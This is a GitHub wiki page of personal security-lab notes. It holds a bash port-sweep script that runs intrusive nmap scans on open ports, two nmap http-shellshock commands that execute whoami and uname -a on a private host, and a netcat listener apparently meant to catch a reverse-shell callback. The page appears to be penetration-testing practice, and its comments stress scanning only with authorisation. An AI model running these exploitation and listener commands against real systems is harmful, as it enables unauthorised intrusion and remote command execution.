Various Codes I have used - 5huckle/OFFICIALTECHJOURNAL GitHub Wiki
The wiki renderer collapses the line breaks in the listings below; open the Edit view to see each script with its original formatting.
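#!/usr/bin/env bash
# Quick TCP connect sweep with a follow-up nmap scan of every open port.
#
# Usage: sweep.sh HOSTFILE PORTFILE
#   HOSTFILE - one host (IPv4 address or hostname) per line
#   PORTFILE - one TCP port (1-65535) per line
#
# Output: a "host,port" CSV header, then one "host,port" line for each pair
# that accepted a TCP connection within 0.1 s. For each such pair an
# `sudo nmap -A -sV` scan of that port is run (its output is interleaved).
#
# Fixes over the original one-liner: the host/port values were interpolated
# unquoted into a `bash -c "..."` string, so a crafted line in either file
# could run arbitrary shell as the invoking user (and, via the nmap call,
# pass extra options to a sudo'd nmap). Values are now validated and passed
# as arguments, never as code. `$ (cat ...)` was also a syntax error.
set -euo pipefail

usage() {
  printf 'usage: %s HOSTFILE PORTFILE\n' "${0##*/}" >&2
  exit 2
}

# Hostname/IPv4 characters only, and no leading '-' so an entry can never be
# parsed as an nmap option.
valid_host() {
  [[ $1 =~ ^[A-Za-z0-9][A-Za-z0-9.-]*$ ]]
}

# Decimal port in 1..65535 (10# prevents leading zeros being read as octal).
valid_port() {
  [[ $1 =~ ^[0-9]{1,5}$ ]] && (( 10#$1 >= 1 && 10#$1 <= 65535 ))
}

main() {
  (( $# == 2 )) || usage
  local hostfile=$1 portfile=$2
  [[ -r $hostfile && -r $portfile ]] || usage

  # Read the port list once instead of re-reading the file for every host.
  local -a ports=()
  local port
  while IFS= read -r port || [[ -n $port ]]; do
    [[ -z $port ]] && continue
    if ! valid_port "$port"; then
      printf 'skipping invalid port: %q\n' "$port" >&2
      continue
    fi
    ports+=("$port")
  done <"$portfile"

  echo "host,port"
  local host
  while IFS= read -r host || [[ -n $host ]]; do
    [[ -z $host ]] && continue
    if ! valid_host "$host"; then
      printf 'skipping invalid host: %q\n' "$host" >&2
      continue
    fi
    for port in "${ports[@]}"; do
      # Connect probe via bash's /dev/tcp, bounded to 0.1 s as before.
      # host/port go in as $0/$1 of the child shell, not into the -c text,
      # so they cannot be interpreted as shell syntax.
      if timeout .1 bash -c 'echo >"/dev/tcp/$0/$1"' "$host" "$port" 2>/dev/null; then
        printf '%s,%s\n' "$host" "$port"
        # -A is noisy and intrusive (OS detection, default NSE scripts,
        # traceroute); only run against hosts you are authorised to scan.
        # A failed scan is reported but does not abort the sweep.
        sudo nmap -A -sV -p "$port" "$host" \
          || printf 'nmap failed for %s:%s\n' "$host" "$port" >&2
      fi
    done
  done <"$hostfile"
}

main "$@"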
# My addition is the nmap scan at the end of the inner loop, run against each host:port the connect probe found open. -A turns on OS detection, version detection, the default NSE scripts and traceroute (noisy and intrusive — only use it against targets you are authorised to scan); -sV is version detection on its own; -p limits the scan to the given port(s), here the single port that just answered.
# Shellshock check of the CGI endpoint /cgi-bin/status on 10.0.5.23:80 using
# the http-shellshock NSE script. Whatever is given as `cmd` is sent to the
# target to be executed, so these two runs execute commands on the remote
# host (whoami, then uname -a): this is exploitation, not just detection,
# and must only be done with authorisation. The leading `echo ; echo ;`
# presumably emits a blank line so the command's output is not swallowed by
# the HTTP headers. The whole --script-args value is quoted once here; the
# arguments nmap receives are the same as in the original two lines.
sudo nmap -p 80 -sV --script=http-shellshock \
  --script-args='uri=/cgi-bin/status,cmd=echo ; echo ; /usr/bin/whoami' 10.0.5.23
sudo nmap -p 80 -sV --script=http-shellshock \
  --script-args='uri=/cgi-bin/status,cmd=echo ; echo ; /bin/uname -a' 10.0.5.23
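# Listen for an incoming TCP connection (presumably the callback from one of
# the payloads above): -n no DNS, -l listen, -v verbose, -p local port.
# The original line had no port argument, so -p had nothing to consume and
# nc would exit with a usage error; the port is now taken from LPORT and
# the command refuses to start without it. Note that some netcat variants
# (OpenBSD nc) reject -p together with -l and want `nc -nlv PORT` instead.
nc -nlvp "${LPORT:?set LPORT to the local port to listen on}"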